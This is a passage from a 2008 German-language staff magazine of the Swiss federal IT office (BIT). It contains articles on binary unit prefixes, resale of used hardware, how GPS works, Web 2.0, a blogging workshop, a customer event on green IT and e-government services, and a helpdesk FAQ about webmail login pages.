abgeleitet von den Begriffen Kilobinary, Megabinary,
Gigabinary usw. Sinngemäss spricht man von Kibibyte
(KiB), Mebibyte (MiB) und Gibibyte (GiB). Zum Vergleich:
1 Kilobyte (KB) = 103 Bytes =
1000 Bytes
1 Kibibyte (KiB) = 210 Bytes = 1024 Bytes
1 Megabyte (MB) = 106 Bytes = 1 000 000 Bytes
1 Mebibyte (MiB) = 220 Bytes = 1 048 576 Bytes
1 Gigabyte (GB) = 109 Bytes = 1 000 000 000 Bytes
1 Gibibyte (GiB) = 230 Bytes = 1 073 741 824 Bytes
Das Wichtigste aber: Die Konsumentinnen und Konsumenten werden also nicht übers Ohr gehauen, denn
unabhängig von der Zählweise hat’s auf der DVD oder der
Festplatte immer gleich viele Bytes Speicherplatz.
Système international d’unités (SI)
www.bipm.org/fr/si
HL
Produkte & Projekte
12
Hardware-Recycling
IT-Altmaterial verkauft sich gut
Das BIT lässt nicht mehr benötigte Hardware über den Onlineshop
«Auctionline» einer Zweitnutzung zukommen. Davon können alle
Mitarbeitenden der BIT-Kunden und des BIT profitieren. Jetzt wurde
das Angebot sogar noch ausgebaut.
BIT-Kontakt:
Stefan Zweili,
Bereichsleiter Delivery
Center
031 323 58 16
Text: Ernst Schlumpf
Die bisherigen IT-Altmaterial-Verkäufe des BIT im
Online-Shop www.auctionline.ch waren ein voller
Erfolg: Die Anfang Jahr in punktuellen Aktionen
angebotenen PCs, Notebooks, Bildschirme usw.
gingen weg wie warme Semmeln. «Viele Computer-Nutzer sind nicht mehr bereit, die rasante
– und teure – technische Entwicklung mitzumachen. Denn für viele Anwendungen genügen
Geräte der letzten Generation vollkommen aus»,
sagt dazu Michel Sautter, Geschäftsführer der
Swiss Remarketing AG. Seit Anfang Jahr arbeitet
das BIT mit der auf den Vertrieb gebrauchter
Computer-Hardware spezialisierten Unternehmung im aargauischen Dottikon zusammen.
Aufgrund des grossen Erfolgs hat das BIT das
ökologisch sinnvolle Hardware-Recycling nun
ausgebaut. Neu werden sämtliche Geräte, für die
das BIT, bzw. die BIT-Kunden keine Verwendung
mehr haben, laufend der Aufbereitung und dem
Verkauf durch Swiss Remarketing zugeführt. Das
Delivery Center des BIT nimmt gerne Meldungen
über weitere grössere Mengen Alt-Hardware
entgegen, um sie ebenfalls auf diesem Weg
einer Weiterverwendung zuzuführen. Somit gibt
es fortan keine punktuellen Verkaufsaktionen
mehr, sondern es sollte im Online-Shop immer
ein genügend grosses Angebot an SecondhandHardware vorhanden sein, die vom Bundespersonal zu Vorzugskonditionen (und mit einer 30-tägigen Laufzeitgarantie) erworben werden kann.
wer damit gearbeitet hat», sagt Michel Sautter.
Das ist auch der Grund, warum es kein Vorrecht
auf ein ganz bestimmtes Gerät, beispielsweise
den eigenen, ausgemusterten Arbeits-PC, gibt.
Die aufbereiteten PCs erhalten das Betriebssystem frisch installiert, Tastaturen und Mäuse
werden in Behindertenwerkstätten oder Strafanstalten penibel gereinigt. Defekte und technisch
überholte Hardware wird der fachgerechten Entsorgung zugeführt.
Zugang nur mit Passwort
Der Online-Shop von Swiss Remarketing hat zwei
Bereiche: Einen passwortgeschützten für Firmen
(«PRO-Bereich») und einen öffentlich zugänglichen Bereich. Die Geräte des BIT werden zuerst
im Firmen-Shop angeboten und – was übrig
bleibt – nach einer gewissen Zeit in den öffentlichen Bereich transferiert. Auf den BIT-FirmenShop können nur Mitarbeitende der BIT-Kunden
und des BIT zugreifen. Wer sich also eines der
Occasions-Schnäppchen sichern will, holt sich auf
dem BIT-Intranet das aktuell gültige Passwort und
loggt sich damit auf www.auctionline.ch im
«PRO-Bereich» ein. S’het solang’s het!
Benutzername und Passwort für den Login finden Sie im Intranet BIT unter «Aktuell»:
http://intranet.bit.admin.ch/aktuell
Français
Aufbereitung und Reinigung
Bevor die Geräte im Online-Shop in den Verkauf kommen, bereiten die Fachleute von Swiss
Remarketing sie professionell auf. Im gesicherten
Wiederaufbereitungscenter werden die vorhandenen Daten auf den Datenträgern mit sehr rigiden Sicherheitsstandards gelöscht. «Somit kann
man später unmöglich nachvollziehen, wo das
IT-Equipment ursprünglich im Einsatz stand und
Le matériel informatique usagé se vend bien
L’OFIT vend du matériel usagé par l’intermédiaire du magasin en ligne «Auctionline». Tous les clients et les collaborateurs
de l’OFIT peuvent profiter de cette offre qui a encore été développée dernièrement. Vous trouverez la version française de
cet article sous www.bit.admin.ch/eisbrecher
Eingeschoben
13
GPS und Co.
Orientierung total
«Bei der nächsten Abzweigung links abbiegen», weist uns eine
mechanisch freundliche Stimme aus dem Lautsprecher den Weg.
Doch wie weiss ein GPS-Navigationsgerät, wo es sich befindet und
welchen Weg der Automobilist einschlagen muss?
Text: Marc Bärtschi
Das Global Positioning System, kurz GPS, ist
wohl das bekannteste Positionsbestimmungssystem. Dieses besteht aus rund 30 Satelliten, die
in 20 000 Metern Höhe ein Signal aussenden,
mit dessen Hilfe ein GPS-Empfangsgerät seine
aktuelle Position auf der Erdoberfläche ermitteln
kann. Ausgerüstet mit einem entsprechenden
Empfänger, steht GPS allen Menschen weltweit,
zu jeder Zeit und kostenlos zur Verfügung. Und
da die GPS-Geräte inzwischen erschwinglich
geworden sind, erfreuen sie sich immer grösserer
Beliebtheit. Zudem sind GPS-Empfänger nicht
mehr nur etwas für Fachleute und TechnikBegeisterte. Auch im Alltag sind mehr und mehr
Anwendungen möglich. Von einfachen Orientierungshilfen über Navigationssysteme
für das Auto geht das Angebot heute
bis hin zu Trainingsunterstützungen
für Sport Treibende.
Wie funktioniert GPS?
Das Prinzip basiert, vereinfacht
gesagt, auf demjenigen um die Entfernung eines Gewitters abzuschätzen: Man vergleicht die Zeitdifferenz
zwischen Blitzschlag und Wahrnehmung des Donnergrollens. GPS funktioniert ähnlich: Um die exakte Positionsbestimmung zu ermöglichen,
sendet jeder GPS-Satellit fortlaufend
ein Signal, das seine Position sowie
den Zeitpunkt des Signalversandes
angibt. Um Folgeberechnungen
zu erleichtern, sendet jeder Satellit
zusätzlich noch Informationen über
seine Umlaufbahn. Das Empfangsgerät bestimmt nun seine Position,
indem es den Zeitpunkt der Signalabgabe mit demjenigen des Signalempfangs vergleicht. Aus der Zeitdifferenz errechnet sich die Distanz zum
Satelliten.
Français
3D-Positionsbestimmung mit 4 Satelliten: Anhand der Zeitdauer, mit der ein
Satelliten-Signal bis zum GPS-Empfangsgerät unterwegs ist, errechnet dieses
seine Distanz zu den einzelnen Satelliten und damit seine Position im Raum.
Zur eindeutigen, dreidimensionalen Positionsbestimmung benötigt
das Empfangsgerät das Signal von
mindestens vier Satelliten. Zu diesen
sollte möglichst eine uneingeschränkte «Sicht»
herrschen, dann ist eine Genauigkeit bis auf
wenige Meter möglich. Das Empfangsgerät
L’orientation sans faille
Une voix synthétique, agréable, nous indique la direction à suivre: «Au prochain carrefour, tournez à gauche». Mais
comment un système de navigation peut-il savoir où il se trouve et quelle direction doit prendre l’automobiliste? C’est
possible grâce au GPS et à des systèmes analogues. Vous trouverez la version française de cet article sous
www.bit.admin.ch/eisbrecher
Eingeschoben
14
berechnet aus den GPS-Signalen die Koordinaten seines aktuellen Standorts. Wenn in diesem
kartografische Informationen hinterlegt sind,
ist zudem eine visuelle Standortinformation auf
einer Landkarte oder einem Stadtplan möglich.
Ständige Neuberechnung der Position erlaubt
darüber hinaus die Ermittlung der Bewegungsrichtung und der Geschwindigkeit.
Ortung via Mobiltelefon: Pseudo-GPS
Grundsätzlich ist die Positionsbestimmung auch
mit einem Mobiltelefon möglich. Jeder Mobilfunkanbieter ist in der Lage, über die Funkzelle,
in der sich das (eingeschaltete) Telefon befindet,
seinen aktuellen Standort zu ermitteln. Diese
Methode ist jedoch sehr ungenau. Je nach Dichte
der Funktürme ist die Standortbestimmung
von hundert Metern bis auf mehrere Kilometer
genau. Seit GPS auch in den Mobiltelefonen Einzug gehalten hat, ist die Ortung derselben um
ein Vielfaches exakter geworden.
Normalerweise lässt sich ein GPS-Empfänger
nicht orten, da diese Geräte nur passiv arbeiten.
Für eine Überwachung via GPS benötigt man
zusätzlich einen aktiven Sender, der die ermittelten Positionsdaten weitergibt. Im Beispiel des
Mobiltelefons können diese Infos per SMS an
einen Dritten gesendet werden. Bereits bieten
einige Mobilfunkunternehmen ihren Kunden
Ortungsservices an. So können verloren gegangene Telefone oder verlaufene Kinder wieder
gefunden werden. Die User müssen allerdings
der Herausgabe der Position des Mobiltelefons
zustimmen. Ansonsten darf ein Mobilfunkunternehmen keinerlei Daten dieser Art an Dritte
weitergeben.
WLAN als GPS-Konkurrenz?
In den USA ist unlängst ein weiteres Positionsbestimmungssystem eingeführt worden, das sich
anhand von Funknetzwerken (WLAN) orientiert.
Das funktioniert so: Jeder WLAN-Hotspot sendet
ununterbrochen ein Signal aus, dessen Stärke
sich messen lässt. Je weiter weg sich der Hotspot
befindet, umso schwächer ist das Signal. Auf
diese Weise lässt sich die Distanz des Messgerätes zum WLAN-Sender ermitteln. Wenn sich nun
mehrere solcher Sender in der Umgebung befinden und die Position dieser bekannt ist, lässt sich
daraus die eigene Position berechnen.
Da Funknetzwerke mittlerweile auch in Privathaushalten weit verbreitet sind, ist die Positionsbestimmung mittels dieses neuen WPS (WLAN
Positioning System) zumindest in Ballungsräumen praktisch flächendeckend möglich. Das Problem ist, dass die Standorte all der existierenden
WLAN-Hotspots grundsätzlich nicht bekannt
sind. Deshalb ist vor der Einführung erst eine
aufwändige «Kartografierung» der bestehenden
Hotspots erforderlich, welche in regelmässigen
Abständen aktualisiert werden muss. Die Genauigkeit bewegt sich auch hier je nach Dichte
der WLAN-Sender um die 20 Meter herum. Im
Gegensatz zu GPS ist die Positionsbestimmung
mit WPS aber auch in Innenräumen möglich.
Wann WPS auch in Europa nutzbar wird, ist noch
nicht bekannt. Die Kartografierung der europäischen Metropolen ist aber bereits im Gang.
GPS: Geschichtlicher Hintergrund
Realisiert wurde GPS vom amerikanischen
Verteidigungsministerium und diente ursprünglich rein militärischen Zwecken. Vollumfänglich
in Betrieb genommen wurde es 1995. Der
zivilen Bevölkerung wurde die volle Funktionsbereitschaft von GPS erst im Jahr 2000 mit dem
Abschalten der künstlichen Ungenauigkeit
(Selective Availability) zur Verfügung gestellt.
Lag die Genauigkeit von Positionsbestimmungen mit Selective Availability bei rund 100
Metern, so liegt sie heute bei ca. 15 Metern.
Um ein präzises Zeitsignal zu liefern, sind die
GPS-Satelliten mit Atomuhren ausgestattet.
Neben dem militärischen Zweck kommt GPS
heutzutage vorrangig in der Luft-, Land- und
Seefahrtnavigation, aber auch bei Landvermessungen und anderen Anwendungen zum
Einsatz, bei denen es auf die genaue Positionsbestimmung ankommt.
Alternativ zu GPS sind momentan mehrere
Länder parallel mit eigenen Entwicklungen
satellitengestützter Systeme beschäftigt. Die
meisten (z.B. Galileo, MTSAT) befinden sich
allerdings noch in der Experimentierphase.
Eingeschoben
15
Web 2.0
Eine vernetzte Geschichte
Die Entwicklungsgeschichte des Homo sapiens sapiens – besser
bekannt als der Mensch – verläuft irgendwie analog zu jener
der Computer oder umgekehrt. In der Biologie nennt man das
Ko-Evolution. Hier lesen Sie, wie sich das zugetragen hat – ausgeschmückt mit deutschen und englischen IT-Begriffen.
Text: Ernst Schlumpf
die das Jagen und Sammeln übersteigen. Mittlerweile waren eineinhalb Millionen Jahre oder
so vergangen und ab jetzt ging alles sehr sehr
schnell. Der Homo sapiens sapiens wurde industrialisiert, informatisiert und instrumentalisiert und
er bekam Zeitungen, Post, Telefonie, Fotografie,
Früher, als wir endlich von den Bäumen herunRadio, TV und ähnlich banale, mediale Mittel.
tergekommen waren, da war wirklich alles ganz
Das führte dazu, dass er bewusster wurde und
anders: Da sass einer vor seiner Höhle mit dem
auch immer mehr wusste und die konventionelriesigen Screen Natur vor den Augen und er
len Mittel wie Briefe usw. nicht mehr ausreichüberlegte, wie er sich wohl am besten vernetzen
ten, um dies zu verbreiten. Nun kam wieder
könnte, um beim Jagen und Sammeln Erfolg zu
einer und fand einen computergestützten Weg,
haben. Er war eine Frühform des Networkers. Er
dies zu tun. Er schrieb einen Dialekt (description
realisierte recht schnell, dass er sich mit seinen
language) namens HTML und via Protokoll (TCP/
Mitmenschen verständigen musste, erfand ein
IP) konnten nun beliebig viele Files von einem
paar Urlaute und schliesslich eine Sprache, eine
Jäger und Sammler zum anderen verschoben
Vorform einer description language, die genau
werden. Das Internet (interconnected networks)
bezeichnete, was gemeint war. Er realisierte, dass war entstanden. Davon gab es im Dienst World
er in der Horde mehr Erfolg hatte und raufte
Wide Web (WWW) eine Version 1.0. Die Version
sich mit seinen Kollegen
Web 1.0 mit HTML
zusammen, betrieb also
war eine Ansammeine Art Social Networlung statischer WebDie Schwerpunkte:
king. Die Horde gab den
sites, die sich via
• Die Web-Evolution
Erfolgs-Orten Namen.
Hyperlink ansteuern
• Web 2.0: Eine Linkliste im Intranet
Das war aktives Tagging,
liessen, aber auch ein
• Nun sind Sie gefragt teilen Sie (uns) Ihr
eine begriffliche und
Datenmedium. Als
Wissen (mit): [email protected]
inhaltliche VerschlagworWeb 2.0 mit XML ist
tung. Weil alles immer
es ein dynamisches
wieder vegessen ging, begann die Gruppe, die
Informations-, Dialog- und Partizipationsmedium
ersten Fonts zu entwickeln, Schriftzeichen und
(Wiki) und als Web 3.0 mit OWL (Web Ontology
Schriften, und diese in steinernen Wordtafeln
Language) könnte es ein konnektives Wissensfestzuhalten. Die waren allerdings zu schwer
medium (Semantic Web) werden. Optimisten
und da es zudem immer mehr mitzuteilen
meinen, dies sei dann die Wissensgesellschaft.
gab, erfand einer
das Papier (Paper,
Sie träumen von der globalen Adaption des
Document). Da
immer mehr Leute
verfügbaren Wissens (Wisdom of Crowds). Pessian diesen Dokumenten teilhaben
misten meinen, dies sei die beginnende virtuelle
wollten, kam
ein weiterer Schlauer
Gesellschaft (Virtual Society). Das meint nichts
auf die
Idee, diese Dokumente
mehr und nichts weniger, als dass diese virtuelle
zu kopieren (copy)
Art der Gesellschaft nicht wirklich da ist, und nur
und zu vervielso tut, wie wenn sie es wäre.
fältigten (paste).
Sie wurden
Wie aber ist die heutige Lage zu beurteilen?
in BuchdeNun, wir sind weder in der Zukunft noch in der
ckel gepackt und in
Gegenwart, wir sind einfach in einer Realität.
Bibliotheken (archives) – eine Art
Nicht in der Virtual Reality, sondern in der reeldata bases – gestellt. Unser Höhlen, tatsächlich Seienden. Da drinnen ist wirklich
lenbewohner war in der Urform
alles gleich wie früher. Wir sitzen vor unserem
einer zivilisierten Gesellschaft
kleinen Screen und suchen nach globalen Spuren
angekommen, denn davon
und Netzwerken. Etwas ganz Entscheidendes ist
spricht man normalerweise, wenn
dennoch bereits geschehen: Das früher als Web
gewisse Skills beherrscht werden,
2.0 häufig herbeizitierte Semantic Web ist zwar
Eingeschoben
16
bis heute nicht angekommen. Im Hintergrund
hat sich aber, quasi als dessen Abfallprodukt,
eine alternative 2.0-Variante etabliert: Das Mitmachweb, welches so heisst, weil es User generated, interaktiv, partizipativ und intermedial ist.
Dieses Web 2.0 ist nach seinem Guru Tim
O’Reilly eigentlich ein Marketingmodell (network
marketing), eine Plattform auch, auf der kollektive Intelligenz genutzt wird. Die Datenaufbereitung ist zentral, Softwarelebenszyklen sind durch
neue Programmiermodelle ersetzt, mobile Geräte
sind integriert und der Desktop ist Webtop. Die
Mitwirkung der Nutzer und Nutzerinnen ist die
entscheidende Komponente: Sie entwickeln
die Basistechnologien (Ajax, Content
Syndication, offene APIs). Anwendungen und Funktionen werden von allen
für alle zur Verfügung gestellt
(Open Source und Free Software).
Die Global markets sind vernetzt.
Immer mehr Provider tummeln
sich im Netz, sie beziehen Clients
und
Customers
in ihre
Services mit ein.
Die Kunden und
Kundinnen nehmen die
Challenges an und teilen (share) ihr Know-how
gegenseitig und nutzen es (Social Shopping). Sie
treten in einer Zwitter-Rolle als Consumer und
Producer gleich Prosumer auf und bieten
ihre Products und ihr Know-how immer
öfter in den Online-Shops der entsprechenden Labels / Brands an. Auf diese
Weise entstehen neue Services und
Märkte. Markt, Angebot, Nachfrage und
Verhalten werden sehr direkt und entscheidend
beeinflusst und verändert.
Positive Interpreten sichten darin einen grossen
Input an Kreativität bis hin zu «neuen Formen
der Ich-Bildung» (der Trendforscher Andreas
Haderlein). Kritiker wie der Internet-Unternehmer
Andrew Keen sehen im Web 2.0 jedoch den
Feind aller Kreativität und fürchten um das Individuum. Freuen wir uns also auf das Web 3.0! Es
ist noch nicht ganz klar, was das denn sein soll/
wird. Es könnte aber das Semantic Web in einer
bereits intelligenten Version sein, die gelernt hat,
Daten logisch zu verknüpfen und zu verarbeiten
und eine intelligente Umgebung zu schaffen
(Ambient Intelligence, verwandt mit Ubiquitous
Computing). In Web 4.0 schliesslich werden intelligente Applikationen den Usern und Userinnen
selbständig weiterhelfen. Und so weiter. Tauchen
wir ein und lassen wir uns überraschen.
Wir begnügen uns an dieser Stelle vorerst einmal mit einer kleinen, aber feinen Auswahl an
Web 2.0-Links, welche Sie im BIT-Intranet unter
http://intranet.bit.admin.ch/eisbrecher finden. Bitte teilen Sie uns Ihre eigenen favorisierten
Links mit, damit wir sie publizieren können:
[email protected].
Events
17
Berner PR-Gesellschaft
PR-Leute bloggen im BIT
Blogs sind in aller Munde. Doch handelt es sich dabei bloss um
eine Modeerscheinung, oder ist Bloggen heute ein unverzichtbarer
Bestandteil der Unternehmenskommunikation? Ende Mai lud die
Berner PR-Gesellschaft zu einem spannenden Workshop ins BIT, um
dieser Frage auf den Grund zu gehen.
BIT-Kontakt:
Nora Kelemen,
Bereichsleiterin Kundenkommunikation
031 323 38 47
Text: Leo Hauser
Foto: Marc Bärtschi
Der Anlass unter dem Titel «Blogs ... Modeerscheinung oder unverzichtbar?» fiel mit dem ersten richtigen Sommertag des Jahres 2008 zusammen. Doch trotz 30 Grad im Schatten strömten
am frühen Abend des 27. Mai fast 90 geladene
Teilnehmerinnen und Teilnehmer aus Privatwirtschaft und Bundesveraltung ins BIT-Hauptgebäude, die «Titanic II». Gerufen hatte die Berner
Public Relations Gesellschaft (BPRG), die für ihre
Mitglieder (zu denen auch das BIT gehört) regelmässig Events zu verschiedensten Themen und
an wechselnden Orten organisiert.
nem Blog zum Gespött machte und seine Kandidatur schliesslich zurückzog.
Im Nu zum eigenen Blog
Muss man Blogs wirklich lesen? Belanglose
Inhalte, in der Szene liebevoll «Katzen-Content»
genannt, gibt es in den Blogs en masse. Doch
Beispiele dafür, dass einzelne Blogger mittlerweile ernstzunehmende Meinungsführer im
Internet sind, wurden am BPRG-Anlass einige
genannt. Und als Meinungsführer werden Blogger natürlich auch für PR-Fachleute interessant.
Denn Blogger sind stark untereinander vernetzt.
Suchmaschinen stufen Blogs hoch ein. Und Blogger können mit spezifischen Inhalten Themen
setzen, popularisieren und einen Diskurs über
diese Themen fördern.
Bloggen als Lebensstil
Nach einer kurzen Vorstellung des BIT durch
Mediensprecher Claudio Frigerio gestaltete der
Berner Journalist und Blogger Mathias Born (borniert.com; webflaneur.espace.ch) den Auftakt
zum Blog-Anlass im BIT. In seinem erfrischenden
In drei Workshops lernten die Teilnehmenden des
Referat gewährte Born einen spannenden EinBPRG-Anlasses im BIT, wie man selbst Blogger
blick in die Blogosphäre. Ein Blog, so definierte
wird und was einen guten Blogger ausmacht.
er in Anlehnung an die Wikipedia, sei ein auf
Unter Anleitung von Caner Aslan (Microsoft
einer Website geführtes, öffentliches Tagebuch,
Schweiz) richteten die PR-Leute in Minutenhäufig endlos, das
schnelle einen Blog
heisst, aus einer
ein und posteten
langen chronoloihren ersten Beitrag.
gisch sortierten
Stefan Meierhans
Liste von Einträ(ebenfalls Microsoft
gen bestehend.
Schweiz) sprach
«Bloggen ist ein
über Blog-Konzepte
Lebensstil», pround zeigte am Beiklamierte Mathias
spiel eines US-Blogs
Born. Blogger
über Hybridautos,
seien besondere
wie sich aus einMenschen, eben
zelnen kritischen
Menschen, die stets
Blogbeiträgen nach
nach Speziellem
und nach eine groAusschau halten,
sse Medienstory
über das man blog- Klarsicht in der Blogosphäre dank Blogger Matthias Born
spinnen kann. Wie
gen könnte. Born
wichtig darum
wies aber darauf hin, dass der Schuss auch nach
für Firmen ein systematisches Blog-Monitoring
hinten losgehen könne, wie zum Beispiel bei
ist, zeigte der dritte Workshop, wiederum mit
jenem US-Präsidentschaftskandidaten, der sich
Mathias Born. Bei einem feinen Apéro klang der
2003 nach allzu emotionalen Statements in seigelungene Event schliesslich aus.
Events
18
Kundenanlass des BIT
«BIT in Action»: Infos aus erster Hand
Um vier spannende Themen kreiste die 7. Ausgabe des BITKundenevents «BIT in Action» vom 13. Juni 2008. Rund 100 Personen aus dem Kundenkreis des BIT folgten der Einladung in die
Aula des Eidgenössischen Personalamtes.
BIT-Kontakt:
Jean-Pierre Beuret
Account Manager
031 325 20 40
kundenkontakte@bit.
admin.ch
Text und Foto:
Leo Hauser
Zwei Prozent der weltweiten CO2-Emissionen
gehen auf das Konto der IT. Das klingt zunächst
nicht nach viel, entspricht aber dem Ausstoss
aller Flugzeuge der Welt. Insofern wundert es
nicht, dass die Energie- und Klimadiskussion
längstens auch in der IT-Branche geführt wird.
Die verschiedenen Lösungsansätze gruppieren
sich unter dem Schlagwort Green IT. Zu diesem
herausfordernden Thema sprachen am «BIT in
Action» die Gastreferenten Markus Maag und
Christoph Wittlinger von Fujitsu-Siemens. Der
Vortrag verschaffte einen Überblick über den
Label-Dschungel und die Referenten zeigten
einen Server-Rechner, der im Betrieb 40% weniger Strom verbraucht. Auch ein Monitor, der im
Standby-Modus keine Energie mehr verbraucht
und der im Betrieb seine Helligkeit automatisch
den Lichtverhältnissen anpasst, wurde vorgestellt.
Schliesslich war zu erfahren, dass auch eine gute
Hardware-Qualität für einen tieferen CO2-Ausstoss sorgt, weil das Auto der Servicetechniker
öfter in der Garage stehen bleiben kann.
Die Zukunft der Bundes-Telefonie
Neben dem Gastreferat bildeten natürlich die
BIT-Topics den thematischen Hauptharst des Kundenanlasses «BIT in Action». Im ersten Vortrag zu
spezifischen BIT-Themen erfuhren die rund 100
Teilnehmenden Wissenswertes über das Projekt
«Neue Telefonie Bundesverwaltung», welches
von Levent Atak, Produktmanager Telekommunikation, und Kurt Schütz, Projektleiter Telekommunikation, vorgestellt wurde. Blickt man auf die
heutige Situation, zeigt sich, dass noch immer
ein Drittel der Telefonie-Endgeräte auf analoger
Technologie basiert. Ins Auge sticht auch die
grosse Anzahl Telefonanlagen – praktisch jedes
Bundesgebäude verfügt über eine eigene Anlage.
«Dies bringt hohe Betriebs- und Wartungskosten
mit sich», betonte Kurt Schütz. «Darum soll das
Projekt ‹Neue Telefonie› die Grundlage für eine
bessere Skalierung liefern, woraus eine Reduktion der Anlagenzahl resultieren wird.»
Weitere Stichworte für die Telefoniezukunft in
der Bundesverwaltung sind sicherlich Voice over
IP (VoIP) und Computer Telephony Integration
(CTI), also computergestütztes Telefonieren. Ziel
ist hier die Integration der Sprachdienste in die
Büroautomation. Die Mitarbeitenden werden
Telefonate via PC steuern können. Kurt Schütz:
«Künftig klickt man in irgendeinem Dokument
oder in den Outlook-Kontakten eine Telefonnummer an und die Telefonverbindung wird
automatisch aufgebaut.» Weitere Fixpunkte sind
«One Phone» (ein Gerät, das Festnetzgerät und
Handy vereinigt), bzw. «One Number» (eine einzige Nummer für verschiedene Arbeitsorte). Die
heutige Telefoninfrastruktur glänzt durch eine
Verfügbarkeit von 99,999 Prozent. Diese hohe
Stabilität soll natürlich auch in Zukunft beibehalten werden. Darum baut das Projekt «Neue
Telefonie» auf einem evolutionären Vorgehen,
auf einer so genannten Soft Migration. Das Telefonie-Projekt des BIT befindet sich heute in der
Konzeptphase.
Formular-Service spart Zeit
Der Formular-Service des BIT war der nächste
Punkt auf der Themenliste des «BIT in Action».
Alain Barras, Entwicklungsverantwortlicher des
CC Internet, legte die Argumente dar, die für
elektronische Formulare sprechen und zeigte
den Einsatz an einem praktischen Beispiel auf.
Dass elektronische Formulare mithelfen, Papier
einzusparen (Stichwort Green IT!), liegt auf der
Hand. Doch ermöglichen die E-Formulare auch
viele Funktionen, die kein Papierformular bietet.
So können verschiedene Formulare miteinander
vernetzt und gruppiert, und natürlich die Bearbeitung der Eingaben automatisiert werden. Die
rationelle und zentralisierte Verarbeitung erlaubt
eine beachtliche Zeitersparnis und erhöht nicht
zuletzt auch die Datensicherheit.
Das beim Formular-Service des BIT zum Einsatz
kommende Produkt ist Jaxforms der Zürcher
Firma xcentric. «Jaxforms ist browserbasiert, man
braucht dafür also keinerlei zusätzliche Software
zu installieren», erklärte Alain Barras. Zu den
weiteren Pluspunkten gehört die Möglichkeit,
individuelle Regeln für die Plausibilität von Formulareingaben zu definieren, zum Beispiel die
automatische Prüfung der Schreibweise einer
E-Mail-Adresse. An einem Prototyp für das Bundesamt für Landwirtschaft demonstrierte Alain
Barras den praktischen Einsatz des Formular-
Events
19
Services. So auch die Möglichkeit, ein angefangenes Formular – gesichert durch ein Passwort
– online zwischenzuspeichern und zu einem späteren Zeitpunkt zu vervollständigen. Ebenso kann
der Benutzer bei Bedarf eine PDF-Quittung des
ausgefüllten Formulars ausgestellt bekommen,
etwa wenn seine eigenhändige Unterschrift auf
dem Formular erforderlich ist.
E-Gov-Services in der SOA
Der Formular-Service ist einer der Bausteine der
service-orientierten Architektur (SOA). Die SOA
dreht sich in der Bundesverwaltung vor allem um
die Realisierung von modularen E-GovernmentServices. Über die SOA Basis Services verschaffte
Bereichsleiter Fernand Hänggi in seinem Referat
im Rahmen des «BIT in Action» einen Überblick.
Der neu gegründete Bereich SOA Basis ist in der
Abteilung E-Government im Lösungszentrum
des BIT angesiedelt. «Unser Bereich stellt die
Schnittstelle zwischen IT-Architektur, den Entwicklern der Services sowie dem Betriebszentrum sicher», erklärte Fernand Hänggi. Wichtige
Grundlage einiger angebotener Services ist die
OSCI-Infrastruktur (OSCI = Online Services Computer Interface), die den sicheren, robusten und
nicht abstreitbaren Datenaustausch unterstützt.
Diese Infrastruktur eignet sich auch für grosse
Datenmengen und wird beispielsweise für die
Volkszählung 2010 eingesetzt.
Die Services im Einzelnen umfassen heute, neben
dem Formular-Service, den AdressverifikationsService zur Überprüfung von Postadressen (verfügbar als Web-Service), den E-Payment-Service
für die Bezahlung per Kreditkarte, den Protokollierungs-Service für das zentrale Logging von
Informationen in einer Datenbank und den Publish/Subscribe-Service zur Verwaltung von Verteilerlisten. Weitere Services in der SOA beinhalten
das Access und Identity Management sowie das
Service-Portal zur Verwaltung von implementierten Services (derzeit in der Pilotphase).
Den Abschluss des «BIT in Action» bildete wie
immer ein Stehlunch, Gelegenheit sich über das
Gehörte und Gesehene auszutauschen.
Tipp. Den kompletten Foliensatz des «BIT in
Action» finden Sie im Intranet BIT (intranet.bit.
admin.ch) unter «Aktuell» > «Veranstaltungen».
Die Referenten des 7. «BIT in Action» (von hinten links): Markus Maag, Daniel
Feldmann (beide Fujitsu-Siemens), Kurt Schütz (Projektleiter Telekommunikation), Levent Atak (Produktmanager Telekommunikation), Alain Barras
(Informationssystem-Architekt CC Internet), Christoph Wittlinger (FujitsuSiemens), Jean-Pierre Beuret (Account Manager BIT), Fernand Hänggi
(Bereichsleiter SOA Basis), René Sprecher (Bereichsleiter Account Management), Romi Meyer (Leiterin Abteilung Kunden)
BITS & Bytes
20
› FAQ
Die komplexe Welt der (Bundes-)IT wirft im Alltag
der Userinnen und User immer wieder Fragen auf.
In jedem «Eisbrecher» beantwortet der Service
Desk BIT einige dieser «frequently asked questions» (FAQ).
Wo finde ich das Benutzerhandbuch zu
Outlook Web Access?
Dank Outlook Web Access (OWA) haben Sie von
zu Hause oder von unterwegs Zugriff auf Ihre
geschäftliche Mailbox. Die Bedienung von OWA
ist keine Hexerei. Trotzdem ist es wissenswert, wie
sich OWA und Outlook im Funktionsumfang
unterscheiden. Auch die besonderen Sicherheitshinweise für OWA sollte man sich regelmässig in
Erinnerung rufen. Alle diese Informationen finden
Sie im kompakten Benutzerhandbuch. Dieses liegt
im Intranet BIT auf Deutsch und Französisch vor:
http://intranet.bit.admin.ch > Angebote >
Büroautomation > Outlook Web Access Global
Woran erkenne ich die korrekte Loginmaske
für RAS-Dienste des BIT?
Grundsätzlich sind die beiden Dienste OWA und
Full Network Access (RABA) zu unterscheiden. In
beide loggen Sie sich über das RAS-Portal ein,
jeweils via eine eigene Zugangsseite:
OWA => https://webmail.admin.ch
RABA => https://ras.admin.ch/[departement] (Bsp. EFD: https://ras.admin.ch/efd)
Welche Login-Maske Sie vor sich haben, sehen Sie
auf der Titelleiste des Browserfensters: «OWA
Logon» für OWA und «RAS Logon» für RABA.
Beim Klick auf mein Webmail-Bookmark
erhalte ich die falsche Login-Maske.
Geben Sie die Adresse des Webmail-Dienstes ein,
werden Sie automatisch auf die Webmail-LoginMaske auf dem RAS-Portal umgeleitet. Wenn Sie
jedoch direkt auf diese Seite bookmarken,
erhalten Sie beim nächsten Aufruf nicht die
gewünschte Login-Maske, denn der Einstieg muss
aus technischen Gründen immer über die Webmail-Adresse https://webmail.admin.ch
geschehen. Ändern Sie also in den Lesezeichen
Ihren Webmail-Bookmark manuell auf diese
Adresse.
KlJ
Störungsmeldungen
Die aktuellen Störungsmeldungen finden Sie
jeweils auf der Startseite des Intranet BIT:
http://intranet.bit.admin.ch
› Kurz notiert
Neue Anleitung: Barrierefreies Content-Filling mit Imperia
Internetangebote der Bundesverwaltung müssen
von Gesetzes wegen barrierefrei gestaltet sein.
Barrierefrei bedeutet, dass die Webseiten so
gestaltet sind, dass auch Menschen mit Seh- oder
Hörbehinderung, motorischer oder kognitiver
Behinderung die Inhalte nutzen können, gegebenenfalls mit Hilfsmitteln wie dem Screen-Reader.
Auf der technischen Seite erfüllt Imperia, das vom
BIT für Kundenwebsites verwendete Content
